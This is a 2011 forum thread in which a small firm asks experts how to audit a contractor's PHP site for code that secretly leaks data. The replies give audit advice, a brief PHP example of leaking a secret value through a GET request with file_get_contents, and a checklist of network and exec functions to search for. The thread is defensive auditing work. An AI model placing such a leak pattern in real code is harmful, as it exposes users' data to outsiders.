Is there a way to verify a check if there suspicious in a web site developed in PHP

Posted on 2011-10-27
Last Modified: 2013-12-25
Where should we look in within a web site developed in PHP from for us to find if there is any malicious code leaking information from our site.  Beside PHP, Java, CGI, etc.
Question by:rayluvs

    Author Comment

    More info.

    It was site developed for us and just turned in.  The site is more like a project & proposal site used by us.   We have doubt of one of the programmers from a conversation we overheard.

    We copied the entire site contents from our FTP to our hard drive to make the search for any link hidden or calls outside our site, faster.

    Basically what we want to know is what to look for in our code that would show us any connection to other sites or how to see if our data is being sent to or received from other site.

    Hope we made our need clear.
    LVL 36

    Accepted Solution

    The suspicious are many ways to inject to the website , i have experienced some ways like IFRAME, JAVASCRIPT way to redirect, some encrypted tags, code in between the texts and HTML tags...

    You can check,  search / verify the IFRAME whether it is being injected on the whole page text/content..
    LVL 36

    Expert Comment

    by:Loganathan Natarajan
    also you may consider to use some tools to scan the entire website code. so that you can find the details.

    Author Comment

    Can we make a search for key words that would flag us possible bad coding ?  Since all the files are text, we figure if we search any keywords and found one, this would rais a black flag.  After we identify all keyword we'll proceed to google more of info pertaining to the message appeared

    LVL 4

    Assisted Solution

    With code - it will most likely require an actual audit of your code to find out if any information is leaked externally.   A simple search - will most likely not net good results, as any malicious programmer would make it hard to pattern match.  

    Things to keep an eye out for -

    - Code that was not requested ( Did you say PHP only?  Do you see code that does not belong?  Unrequested Javascript? )
    - Extern / system calls - Check what is being executed.  Find out what it is.  If you can not tell what is being executed, that's a huge red flag.
    - Files & output - Look for any writing to disk.   Are files being saved to public access area or FTP accessible areas?   What kind of information is written to these files?  
    - IP addresses, URIs - look for any internet addresses.  Look for decimal format IP addresses.
    - Obfuscation - Do you see any areas of code that are difficult to read?  These should be scrutinized with a fine tooth comb.  

    What I would strongly suggest (this is what I personally would do, if I were unfamiliar or uncomfortable with a language) is to have a completely unrelated third party audit the code.  I HIGHLY suggest to let someone who knows what they are looking for ... look for it.  This is especially vital if you are held to a high security standard - or if you are in a position to face financial loss in case of data breach.  ( such as - you're a merchant, or have private information to protect. )   The initial investment of protecting yourself - is a very smart investment.
    LVL 82

    Expert Comment

    by:Dave Baldwin
    I agree with @kyanwan, if you don't have the ability to write the code yourself, then you should have someone else audit it.  I know I could put things in PHP and javascript that a novice could not find.
    LVL 107

    Assisted Solution

    by:Ray Paseur
    If you are able to get him, this fellow is one of the leading experts in PHP security and he will be able to audit the code for you.  Expect to pay $XX,000 plus expenses, but you will get the peace-of-mind that comes from an iron-clad, expert response.

    If you cannot get Chris, you want to make a Google search for "PHP Security" and try to get someone else who is a noted author and speaker.

    The point is, as kyanwan and Dave suggest, that you do not know what you do not know.  Specialized skills and knowledge are required to find the sorts of things that you must find if you want a secure system.  As the noted fire fighter Red Adair once said, "If you think it's expensive to hire a professional, just wait until you hire an amateur!"

    Best of luck, ~Ray

    Author Comment

    Thank you very much on this valuable info.

    Regarding contracting a professional to validate our site; is a great recommendation.  However, the investment is not justified for us for the following reasons:

             - We are not a big firm
             - the contents developed is not a complex contents
             - not that security sensitive
             - the total size is not over 3mb
             - is not live yet

    What we're looking for is more like the details provided by kyanwan in the first part of ID: 37043207.  

    We are not experts in some tech areas, but with EE assistance we have successfully done a series of tasks that we would have not been able to do before.  This site is Excellent!

    We are not looking for an actual step-by-step of a "How-To" detecte flaws or leaks, but something like  kyanwan in the first part of ID: 3704320; a guidance of where to look.

    For example, when we contract a VB programmer, prior going live with the apps developed, we look at the code for all connections, external calls to other apps or ips to make sure that the cobtrol stays where we want.  For example the SQL connections, calls of other apps or ascii files that may input or output data for creating connections, IPs, we even look at functions to see if it create values for accessing other areas (we found once a function using char(x) until it spells out actual address), stuff like this.

    In web, that's what we are trying to do to prior going live.

    A little more info

    The contents is compose of (by file types):

       - Cascading Style Sheet Document (1 file)
       - Icon (16)
       - JS File (3)
       - PNG File (40)
       - JPEG image (1)
       - GIF file (1)
       - HTML Document (1)
       - PHP File (29)

    Can you gives some actual names to look for or logic flow, anything that would help us to just look. It's riot a big apps so we are willing to invest some time.

    Please advice.
    LVL 33

    Assisted Solution

    greetings Ramante, in your post ID:37045538 , you may not need to look at the image files (gif, jpg, png, icon) or the css (if there is malicious code in these you are in way over your head - my opinion), and you will need to look at the javacsript php and maybe the html.
    First , I see as important what you will do (the action you take, as to the developer and your organization) if you find something that you think "might be" malicious code leaking information, as opposed to "definitely bad" malicious code leaking information, which may have you ask the developer what the code is doing, or just get another developer to do your site again.

    Thee are so many ways to send info to other places, as in "malicious code leaking information", , for instance you can just connect to a remote database (mySQL, windows databases, and others) and insert your data into that data base, so someone else can use your data, without your permission or knowledge.
    There are several ways to connect and send/receive data in PHP and other serverside code base, there is SOAP -
    $Trans = new SoapClient("");

    also it is posible to send data to another place just by requesting a page, and using a GET

    $myData = "Secret_Valuable_Information";
    $page = file_get_contents(''.$myData);
    but as has been mentioned, you can mix and match code segments in PHP to "Hide" or Obfuscation so that searching for text may not show you much "Malicious Code"

    Author Comment

    Thanx Slick812, yes something like that.  What we are looking for are keywords, not actual strings.  For example, we finished checking the site contents file which are in PHP, Java, Cgi, etc, since they are text, for keywords as:

       ip values (search for
       " exec("
    Also just finished incorporating your keywords:


    In essences we would like from EE first hand experience of specific commands in PHP/Java/Ajax/Ect.  that would either Saves to Files, Open Paths, Saves to Database, etc.

    We want to compile and setup some sort of "checklist" of word to look for and then identify is if being used correctly in our site.  

    What we need is example of command word.

    LVL 4

    Assisted Solution

    By the description of your data that you've done - I've got a feeling that your code is most likely safe.  If your data, by your own recognition, is not that valuable ... chances are the programmer will value future work from you more than some seemingly worthless information.


    One other thing --Do not ignore the output of your site.   A malicious coder could always take what they want, and put it secretly right out in the open to pick up later.  Try to find any blocks of code that seemingly do nothing, or modify page output in minute & inconsistent ways.  ( Read more :  ; in summary, look for I/O that has no value to your program in your code.   If you find it, take a second and third look at it - no matter how irrelevant it may seem. )

    If you have a block of code that changes output based on variables that you consider your more 'critical" information, that should be suspect & checked over.  If you can't think of a good explanation for the code - it's worth more scrutiny.  

    For your output, to do some quick detection that's easy & low cost - get a multi-file text editor (like editplus, or even microsoft word if you copy paste the code) - and open 10-20 different output pages from your site.   Check for inconsistencies in the generated output from page-to-page.  ( A very easy way to do this - just have your captured data all open, flip through your tabs while scrolling down bit-by-bit , with each page in the same position. )

    Author Comment

    Thanx for the info.

    Since all files the actually do processing within a site are text file, we are searching within them for names or commands that write/read to other site.

    To close the question, and besides the keywords we are searching for (see ID: 37050756), can you guys give us any additional names of commands that would do the following:

          - Write to
          - Copy To
          - Read From
          - command that would send emails

    Greatly appreciated
    LVL 33

    Assisted Solution

    I am posting here, just to give a few ideas for PHP methods I can think of that I remember for network (web) transfer of data, the main two (in my mind) would be -
    curl_init( )   ,   socket_create ( )

    some others -
    ldap_connect( )   ,  ftp_connect( )   ,  ftp_ssl_connect( )

    but there are so many ways to web transfer, that I don't think of others right now, ,  of course you could always just send an email with  mail( )

    you may want to look more closely at the code places that deal with the DATA that you consider valuable and see if there are any references to web addresses or IP numbers that are not associated with your site.

    Author Comment

    Ok thanks all.  We think we got a very valuable info from your guys

    Author Closing Comment


    Featured Post

    Courses: Start Training Online With Pros, Today

    Brush up on the basics or master the advanced techniques required to earn essential industry certifications, with Courses. Enroll in a course and start learning today. Training topics range from Android App Dev to the Xen Virtualization Platform.

    Join & Write a Comment

    Batch, VBS, and scripts in general are incredibly useful for repetitive tasks.  Some tasks can take a while to complete and it can be annoying to check back only to discover that your script finished 5 minutes ago.  Some scripts may complete nearly …
    This article will show, step by step, how to integrate R code into a R Sweave document
    Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
    In this fifth video of the Xpdf series, we discuss and demonstrate the PDFdetach utility, which is able to list and, more importantly, extract attachments that are embedded in PDF files. It does this via a command line interface, making it suitable …

    755 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    19 Experts available now in Live!

    Get 1:1 Help Now